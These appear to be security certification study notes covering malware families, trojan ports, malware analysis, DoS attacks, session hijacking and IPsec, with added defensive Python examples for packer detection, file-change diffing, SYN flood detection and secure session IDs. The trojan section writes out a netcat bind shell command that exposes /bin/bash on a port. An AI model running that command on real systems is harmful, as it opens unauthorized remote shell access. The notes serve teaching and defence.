- Malware and Other Attacks
- Software designed to harm or secretly access a computer system without informed consent
- Most is downloaded from the Internet with or without the user's knowledge
- Overt Channels: legitimate communication channels used by programs
- Covert Channels: used to transport data in unintended ways
- Wrappers: programs that allow you to bind an executable to an innocent file
- Example: IExpress Wizard
- Crypters
- Using a combination of encryption and code manipulation to render malware undetectable to security programs
- Example: BitCrypter
- Packers
- Compressing the executable into a smaller size and obscuring the actual program, which helps evade signature-based detection; the original code is only decompressed in memory at run time
- The entry point of a packed executable often falls in a section whose name is the name of the packer (for example UPX0/UPX1 for UPX), which is how tools like PEiD identify it
- Droppers: installing other malware files on to system either from malware package or Internet
- Downloader: downloading other malware from Internet on to PC
- Injector: injecting its code into other vulnerable running processes and changing their execution flow in order to hide or prevent removal
- Obfuscator: concealing its code, making it hard for security mechanisms to detect or remove it
- Exploit Kit: helping to deliver exploits and payloads, like Crimepack
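As an added worked example (not part of these notes and not PEiD's own logic), a small Python packer heuristic: it walks the PE section table, finds the section that holds the entry point, checks section names against a list of well-known packer section names, and computes per-section Shannon entropy, since compressed or encrypted code runs close to 8 bits per byte while plain x86 code sits around 5 to 6.5. The two sample images are constructed inside the code (a fake UPX layout and a plain one) and contain no real machine code; the packer name list and the 7.0 entropy threshold are assumptions, not a signature database.

```python
import math
import random
import struct

# Section names well-known packers leave behind (assumed list, PEiD-style hint).
PACKER_SECTION_NAMES = {
    b"UPX0": "UPX", b"UPX1": "UPX", b"UPX2": "UPX",
    b".aspack": "ASPack", b".adata": "ASPack", b".petite": "Petite",
    b".MPRESS1": "MPRESS", b".MPRESS2": "MPRESS",
    b".vmp0": "VMProtect", b".vmp1": "VMProtect", b".themida": "Themida",
}
HIGH_ENTROPY = 7.0  # bits/byte; assumed threshold for "compressed or encrypted"


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 8.0 means every byte value is equally likely."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(image: bytes):
    """Return (entry_point_rva, [section dicts]) from a PE32/PE32+ image."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", image, 0x3C)[0]          # e_lfanew
    if image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", image, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", image, pe_off + 20)[0]
    opt_off = pe_off + 24                                       # optional header
    entry_rva = struct.unpack_from("<I", image, opt_off + 16)[0]  # AddressOfEntryPoint
    sections = []
    for i in range(num_sections):
        hdr = opt_off + opt_size + i * 40                       # 40-byte section headers
        name = image[hdr:hdr + 8].rstrip(b"\0")
        vsize, vaddr, raw_size, raw_off = struct.unpack_from("<IIII", image, hdr + 8)
        raw = image[raw_off:raw_off + raw_size]
        sections.append({"name": name, "vaddr": vaddr, "vsize": vsize,
                         "raw_size": raw_size, "entropy": shannon_entropy(raw)})
    return entry_rva, sections


def assess_packing(image: bytes) -> dict:
    """Flag an executable as probably packed if its entry point lives in a
    packer-named section or any section's content is high-entropy."""
    entry_rva, sections = parse_pe(image)
    entry_sec = next((s for s in sections if s["vaddr"] <= entry_rva
                      < s["vaddr"] + max(s["vsize"], s["raw_size"])), None)
    hint = PACKER_SECTION_NAMES.get(entry_sec["name"]) if entry_sec else None
    if hint is None:  # the unpacking stub may sit elsewhere; any known name counts
        hint = next((PACKER_SECTION_NAMES[s["name"]] for s in sections
                     if s["name"] in PACKER_SECTION_NAMES), None)
    hot = [s["name"].decode(errors="replace") for s in sections if s["entropy"] >= HIGH_ENTROPY]
    return {"entry_section": entry_sec["name"].decode(errors="replace") if entry_sec else None,
            "packer_hint": hint, "high_entropy_sections": hot,
            "packed": hint is not None or bool(hot)}


def build_pe(sections):
    """Constructed minimal PE32 image (headers only, no real code) from
    [(name, raw_bytes, entry_point_here)]; used purely as sample input."""
    n = len(sections)
    raw_off = (64 + 4 + 20 + 224 + 40 * n + 0x1FF) & ~0x1FF     # 0x200 file alignment
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    headers, body, vaddr = b"", b"", 0x1000
    for name, data, is_entry in sections:
        if is_entry:
            struct.pack_into("<I", opt, 16, vaddr)              # AddressOfEntryPoint
        size = len(data)
        headers += (name.ljust(8, b"\0") + struct.pack("<IIII", size, vaddr, size, raw_off + len(body))
                    + b"\0" * 12 + struct.pack("<I", 0x60000020))
        body += data
        vaddr += (max(size, 1) + 0xFFF) & ~0xFFF                # 0x1000 section alignment
    image = dos + b"PE\0\0" + coff + bytes(opt) + headers
    return image.ljust(raw_off, b"\0") + body


_rng = random.Random(7)
PACKED_SAMPLE = build_pe([                      # constructed UPX-like layout
    (b"UPX0", b"", False),                      # empty, gets filled at run time
    (b"UPX1", bytes(_rng.getrandbits(8) for _ in range(4096)), True),  # "compressed" blob
    (b".rsrc", b"\0" * 512, False),
])
CLEAN_SAMPLE = build_pe([                       # constructed plain layout
    (b".text", b"\x55\x89\xe5\x90\x90\x5d\xc3" * 300, True),   # repetitive stub code
    (b".data", b"hello, world\0" * 40, False),
])

if __name__ == "__main__":
    print(assess_packing(PACKED_SAMPLE))
    print(assess_packing(CLEAN_SAMPLE))
```

Entropy alone produces false positives on executables with large embedded resources (images, compressed archives), so the section-name hint and the location of the entry point are used together rather than either on its own.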
- Software that appears to perform a desirable function but instead performs malicious activity
- To hackers, it is a method to gain and maintain access to a system
- Trojans are means of delivery whereas a backdoor provides the open access
- Remote Access Trojan (RAT): providing attackers with full control over the victim's system, enabling them to remotely access files, private conversations, accounting data, and others
- PoisonIvy
- MoSucker
- Blackhole
- Backdoor Trojan: RAT has UI, the client component, whereas a backdoor does not
- Botnet Trojan: infecting numerous computers across a large geographical area to create a network of bots that is controlled through a Command and Control (C&C) center
- Necurs
- Mirai
- E-banking Trojans: intercepting the victim's account information before the system can encrypt it, and sending it to the attacker's C&C center
- Zeus
- Proxy Server Trojan: usually a standalone application that allows remote attackers to use the victim's computer as a proxy to connect to the Internet
- Covert Channel Tunneling Trojan (CCTT): a RAT, creating arbitrary data transfer channels in previously authorized data streams
- Defacement Trojan: once it has spread over the system, can destroy or change the entire content present in a database
- Command Shell Trojan: providing a backdoor to connect to through command-line access
- Netcat
- "Swiss army knife" of TCP/IP hacking
- Providing all sorts of control over a remote shell on a target
- Can connect over TCP or UDP, from any port
- Offering DNS forwarding, port mapping and forwarding and proxying
- Connect to a listener (client side):
nc IPaddress Port#
- Open a listening port on 5555 from target machine (bind shell; `-e` runs a program and attaches it to the connection):
nc -l -p 5555 -e /bin/bash
- The `-e` option exists in the traditional netcat and as `--exec` in ncat; the OpenBSD netcat shipped by many Linux distributions does not have it
- CryptCat: encrypted version of netcat
- Common Trojan ports
Trojan Name | Port |
---|---|
Death | 2 |
Senna Spy | 20 |
Hackers Paradise | 31,456 |
TCP Wrappers | 421 |
Doom, Santaz Back | 666 |
Silencer, WebEx | 1001 |
RAT | 1095-98 |
SubSeven | 1243 |
Shiva-Burka | 1600 |
Trojan Cow | 2001 |
Deep Throat | 6670-71 |
NetBus | 12345-6 |
Whack a Mole | 12361-3 |
Back Orifice | 31337,8 |
- Process Explorer: Sysinternals (Microsoft) tool that shows you everything about running processes
- Registry Monitoring Tools
- SysAnalyzer
- Active Registry Monitor
- Regshot
- Tripwire: integrity verifier that can act as a HIDS in protection against Trojans
- SIGVERIF: File Signature Verification tool built into Windows to verify the integrity of the system by checking digital signatures
- Log file can be found at c:\windows\system32\sigverif.txt
- Looks for drivers and system files that are not signed
- Self-replicating program that reproduces by attaching copies of itself into other executable code
- Usually installed by user clicking on malicious file attachments or downloads
- Virus Hoax: a kind of bluff and false alarm claiming reports about nonexistent viruses to cause fear
- Fake Antivirus: trying to convince a user has a virus and have them download an AV that is a virus itself
- Ransomware: malicious software designed to deny access to a computer until a price is paid; usually spread through email
- Locky: Using RSA-2048 and AES-128 to lock files
- WannaCry: famous ransomware; within 24 hours had 230,000 victims; spread by exploiting an unpatched SMBv1 vulnerability (MS17-010, the EternalBlue exploit)
- Petya/NotPetya: spreading over the network using WMIC (Windows Management Instrumentation Command-line) and PsExec with credentials captured from the local machine by a Mimikatz-style tool
- Boot Sector Virus: known as system virus, moving boot sector to another location and then inserts its code in the original location
- Shell Virus: wrapping around an application's code, inserting itself before the application's
- Cluster Virus: modifying directory table entries so that they point users or system processes to the virus code instead of the actual program; every time a file or folder is opened, the virus runs
- Multipartite Virus
- Attempting to infect both boot sector and files
- Generally referring to viruses with multiple infection methods, or executing differently in different places on the target at the same time
- Macro Virus: written in VBA, infects template files, mostly MS Word and MS Excel
- Polymorphic Code Virus: mutating its code by using a polymorphic engine; difficult to find because code is always changing
- Encryption Virus: using encryption to hide the code from antivirus
- Metamorphic Virus: rewriting itself every time it infects a new file
- Win32/Simile
- Zmist (Zombie.Mistfall): the first virus to use a technique called code integration; it inserts itself into the middle of existing code, then regenerates the code and rebuilds the executable around itself
- Stealth Virus: known as tunneling virus, attempts to evade AVs by intercepting the system's service call interrupts while running, so that reads of infected files return clean-looking data
- Cavity Virus: overwriting portions of host files as to not increase the actual size of the file; uses null content sections
- Armored Virus: containing a variety of mechanisms specifically coded to make its detection and decryption very difficult
- Companion/Camouflage Virus: spoofing a scanner by camouflaging itself to the identical file name as targeted program file
- Sparse Infector Virus
- Only infecting occasionally, like every tenth program executed
- Deciding which file to infect based on certain conditions, like target file with max. size of 128kb
- File Extension Virus: using a double extension to take advantage of Windows hiding known file extensions by default (readme.txt.vbs shows as readme.txt)
- Logic Bomb Virus: triggered by a response to an event, such as launching an application or when a specific date/time is reached
- Self-replicating malware that sends itself to other computers without human intervention
- Usually doesn't infect files, just resides in active memory
- Often used in botnets
- Sheep Dip: analysis of suspect files or media on an isolated computer before they are allowed onto the network
- Sheep Dip Computer: installed with port monitors, file monitors, network monitors and antivirus software; connects to a network only under strictly controlled conditions
- Static analysis: taking apart a given executable (disassembly) to study its functionality and features without running it
- Tools
- HashMyFiles: file fingerprinting
- VirusTotal: online malware scanning
- PEiD: identifying packing/obfuscation methods
- Dependency Walker: listing all dependent modules of an executable file
- IDA Pro: disassembler and debugger
- Running malware and identifying changes to the system, usually in a sandbox environment
- Make sure you have a good test bed
- Use a VM with NIC in host-only mode and no open shares
- Analyze the malware on the isolated VM in a static state
- Tools: BinText (extract strings) and UPX (unpack UPX-packed binaries) help when looking at the binary
- Run the malware and check out processes
- Use Process Monitor, etc. to look at processes
- Use NetResident, TCPview or even Wireshark to look at network activity
- Check and see what files were added, changed, or deleted
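Added example for the "check what files were added, changed, or deleted" step (not a tool from these notes): a Regshot-style before/after file-system snapshot in Python, hashing every regular file with SHA-256 and diffing the two states. The "malware run" here is a constructed stand-in that drops a file, edits a hosts file and deletes its own installer inside a temporary directory; on a real analysis VM you would snapshot the guest's file system (and registry) before and after detonation and compare the same way.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def snapshot(root: str) -> dict:
    """Map relative path -> SHA-256 for every regular file under root."""
    state = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath, name)
            if p.is_symlink():            # do not follow links the sample may plant
                continue
            state[str(p.relative_to(root))] = hashlib.sha256(p.read_bytes()).hexdigest()
    return state


def diff_snapshots(before: dict, after: dict) -> dict:
    """Classify files as added, changed or deleted between two snapshots."""
    common = set(before) & set(after)
    return {
        "added": sorted(set(after) - set(before)),
        "deleted": sorted(set(before) - set(after)),
        "changed": sorted(p for p in common if before[p] != after[p]),
    }


def simulate_sample_run(root: str) -> None:
    """Constructed stand-in for detonating a sample: drops a payload in a temp
    directory, tampers with a hosts file and removes its own installer."""
    temp = Path(root, "Windows", "Temp")
    temp.mkdir(parents=True, exist_ok=True)
    (temp / "svch0st.exe").write_bytes(b"MZ-payload")          # fake dropped file
    Path(root, "hosts").write_text("127.0.0.1 av-update.example\n")  # blocks AV updates
    Path(root, "installer.exe").unlink()                       # self-delete


def demo() -> dict:
    """Take a baseline, run the (simulated) sample, and report what changed."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "hosts").write_text("127.0.0.1 localhost\n")
        Path(root, "installer.exe").write_bytes(b"MZ-installer")
        Path(root, "readme.txt").write_text("untouched\n")
        before = snapshot(root)
        simulate_sample_run(root)
        return diff_snapshots(before, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Hashing content rather than comparing timestamps matters: timestomping malware resets modification times, but it cannot keep the SHA-256 of a file it rewrote.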
- Detecting new or unknown viruses that are usually variants of an already existing virus family
- Drawback: too many false positives
- Can be static or dynamic
- Static Heuristic Analysis: The anti-virus analyzes the file format and code structure to determine if the code is viral
- Dynamic Heuristic Analysis: The anti-virus performs a code emulation of the suspicious code to determine if the code is viral
- IDA Pro
- Anubis
- Threat Analyzer
- Make sure you know what is going on in your system
- Have a good antivirus that is up to date
- DEP (Data Execution Prevention): marks memory pages that hold data (stack, heap) as non-executable, so code that an exploit injects there cannot run; it does not stop script-based attacks such as a malicious batch or PowerShell script
- DLP (Data Loss Prevention): a strategy for preventing end users from sending sensitive or critical information outside of the corporate network
- Seeking to take down a system or deny access to it by authorized users
- Botnet: network of zombie computers a hacker uses to start a distributed attack
- Can be controlled over HTTP, HTTPS, IRC, or ICQ
- Fragmentation Attack: taking advantage of the system's ability to reconstruct fragmented packets
- Volumetric Attack: bandwidth attack, consuming all bandwidth for the system or service
- Application Attack
- Consuming the resources necessary for the application to run
- Application level attack is against weak code
- Application attack is just the general term
- TCP state-exhaustion Attack: going after load balancers, firewalls and application servers by attacking connection state tables
- SYN Flood: sending thousands of SYN packets with fake source IP addresses and never responding to the SYN/ACK packets; lots of half-open connections where the 3-way handshake is never completed; eventually the target's connection table runs out of resources
- ICMP flood: sending ICMP ECHO packets with a spoofed address; eventually the target's capacity to process and answer packets per second is exhausted
- Smurf: sending large number of pings to the broadcast address of the subnet with source IP spoofed as the target, entire subnet responds exhausting the target; using ICMP ECHO requests
- Fraggle: same as Smurf but with UDP packets
- Ping of Death: fragmenting ICMP messages, after reassembled, ICMP packet is larger than the maximum size and crashes the system
- Teardrop: overlapping numerous garbled TCP/IP fragments with oversized payloads, causes older systems to crash due to fragment reassembly
- Phlashing: also known as bricking a system, causing permanent damage to a system
- LAND Attack (Local Area Network Denial): sending a TCP SYN packet to the target with a spoofed IP the same as the target; if vulnerable, target loops endlessly and crashes
- DDoS (Distributed Denial of Service): the incoming traffic flooding the victim originates from many different sources
- DRDoS (Distributed Reflection Denial of Service): using IP spoofing, requests are sent to third-party reflectors with the source address set to the targeted victim, so all the replies go to the target and flood it
- Slowloris: trying to keep many connections to the target web server open and hold them open as long as possible
- Low Orbit Ion Cannon (LOIC): DDoS tool that floods a target with TCP, UDP or HTTP requests
- Trinity: Linux based DDoS tool
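Added example (not from these notes): detection logic for the SYN flood / TCP state-exhaustion pattern, run over constructed client-to-server packet records rather than a real capture. From the server's point of view a source that sends a SYN but never follows with an ACK is a half-open connection, which is exactly what a flood with spoofed source addresses produces; the record format (`ts src dst dport flags`), the addresses and the thresholds are all assumptions made for the example.

```python
from collections import defaultdict


def make_sample_log(flood_sources=200, legit_clients=10):
    """Constructed client->server packet records, not a real capture.
    Spoofed sources send a lone SYN; real clients finish with an ACK."""
    lines = []
    for i in range(flood_sources):                       # spoofed: SYN only
        src = f"203.0.{i // 254}.{i % 254 + 1}"
        lines.append(f"{i * 0.002:.3f} {src} 192.0.2.10 443 S")
    for j in range(legit_clients):                       # legit: SYN then ACK
        t, src = 0.5 + j * 0.01, f"10.0.0.{j + 1}"
        lines.append(f"{t:.3f} {src} 192.0.2.10 443 S")
        lines.append(f"{t + 0.005:.3f} {src} 192.0.2.10 443 A")
    return lines


def parse(lines):
    for line in lines:
        ts, src, dst, dport, flags = line.split()
        yield float(ts), src, dst, int(dport), flags


def detect_syn_flood(lines, window=1.0, min_half_open=100, min_ratio=0.8):
    """Per (dst, dport, time window): sources that sent SYN but no ACK are
    half-open connections (their SYN/ACK went to a spoofed address). Alert
    when both the count and the share of half-open attempts exceed thresholds.
    Sources are tracked as sets so SYN retransmits are not double-counted;
    a production tracker would keep per-connection state across windows."""
    syn = defaultdict(set)   # key -> sources that sent a SYN
    ack = defaultdict(set)   # key -> sources that completed the handshake
    for ts, src, dst, dport, flags in parse(lines):
        key = (dst, dport, int(ts // window))
        if flags == "S":
            syn[key].add(src)
        elif flags == "A":
            ack[key].add(src)
    alerts = []
    for key, sources in syn.items():
        half_open = sources - ack.get(key, set())
        ratio = len(half_open) / len(sources)
        if len(half_open) >= min_half_open and ratio >= min_ratio:
            dst, dport, w = key
            alerts.append({"dst": dst, "dport": dport, "window": w,
                           "half_open": len(half_open), "ratio": round(ratio, 2)})
    return alerts


if __name__ == "__main__":
    for alert in detect_syn_flood(make_sample_log()):
        print(alert)
```

The ratio check is what separates a flood from a popular service: a busy web server also sees many SYNs per second, but almost all of them complete the handshake.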
- Attacker waits for a session to begin and after the victim authenticates, steals the session for himself
- Sequence number prediction can be done by knowing the window size and the packet sequence number
- Also can be done via brute force, calculation or stealing
- Sniff the traffic between the client and server
- Monitor the traffic and predict the sequence numbering
- Desynchronize the session with the client
- Predict the session token and take over the session
- Inject packets to the target server
- Using unpredictable session IDs
- Limiting incoming connections
- Minimizing remote access
- Regenerating the session key after authentication
- Using IPsec to encrypt
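Added example for the "unpredictable session IDs" and "regenerate the session key after authentication" countermeasures (not from these notes): a weak counter-based session store beside a hardened one in Python. The hardened store draws 256-bit IDs from `secrets`, keeps only a SHA-256 of each ID server-side, and issues a fresh ID at login so a token sniffed or planted before authentication is invalidated rather than upgraded. Class and method names are the example's own.

```python
import hashlib
import secrets


class WeakSessionStore:
    """Predictable IDs from a counter: sniff one, guess its neighbours."""

    def __init__(self):
        self._next = 1000
        self.sessions = {}

    def create(self, user=None) -> str:
        sid = str(self._next)
        self._next += 1
        self.sessions[sid] = {"user": user}
        return sid


def guess_next(observed_sid: str) -> str:
    """Attacker's prediction step against the weak store."""
    return str(int(observed_sid) + 1)


class SessionStore:
    """Hardened store: 256-bit random IDs, only a hash of the ID kept
    server-side, and a fresh ID issued when the user authenticates."""

    def __init__(self):
        self._sessions = {}              # sha256(sid) -> session data

    @staticmethod
    def _key(sid: str) -> str:
        # A dumped session table then yields no usable tokens.
        return hashlib.sha256(sid.encode()).hexdigest()

    def create(self, user=None) -> str:
        sid = secrets.token_urlsafe(32)  # 32 random bytes -> 43 URL-safe chars
        self._sessions[self._key(sid)] = {"user": user}
        return sid

    def lookup(self, sid: str):
        return self._sessions.get(self._key(sid))

    def login(self, old_sid: str, user: str) -> str:
        """Regenerate the ID after authentication: the pre-auth session is
        dropped, so a fixed or sniffed token does not become an
        authenticated one."""
        self._sessions.pop(self._key(old_sid), None)
        return self.create(user)

    def logout(self, sid: str) -> None:
        self._sessions.pop(self._key(sid), None)


if __name__ == "__main__":
    weak = WeakSessionStore()
    seen = weak.create("victim")
    print("weak: guessed", guess_next(seen), "actual", weak.create("next-victim"))
    store = SessionStore()
    pre = store.create()
    post = store.login(pre, "alice")
    print("pre-auth token still valid?", store.lookup(pre) is not None)
```

Regeneration at login is the part most frameworks get right by default and most hand-rolled stores forget; it is also the fix for session fixation, where the attacker supplies the victim's session ID before the victim authenticates.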
- Transport Mode
- Payload and ESP trailer are encrypted, not the IP header; the original header still routes the packet exactly as it would without IPsec
- Used end-to-end between two hosts
- Tunnel mode
- The entire original packet (header and payload) is encrypted and wrapped in a new IP header; used between gateways (site-to-site VPN) or from a remote client to a gateway
- NAT caveat: AH breaks under NAT in either mode because it authenticates the outer IP header that NAT rewrites; ESP passes through NAT only with NAT-Traversal (UDP encapsulation on port 4500), which is the normal configuration for tunnel-mode VPNs
- Architecture Protocols
- Authentication Header: guarantying the integrity and authentication of IP packet sender
- Encapsulating Security Payload (ESP): providing origin authenticity and integrity as well as confidentiality
- Internet Key Exchange (IKE): negotiating the security associations and producing the keys for the encryption/decryption process; UDP port 500 (UDP 4500 with NAT-T)
- Oakley: using Diffie-Hellman to create master and session keys
- Internet Security Association Key Management Protocol (ISAKMP): framework defining the procedures and packet formats for establishing, negotiating, modifying and deleting security associations; IKE is built on it
- Ettercap: man-in-the-middle tool and packet sniffer on steroids
- Zaproxy
- Paros proxy
- Burp Suite
- Hamster: session sidejacking tool that replays sniffed cookies (used with the Ferret sniffer)
- IKE-scan: IPsec VPN scanning and fingerprinting tool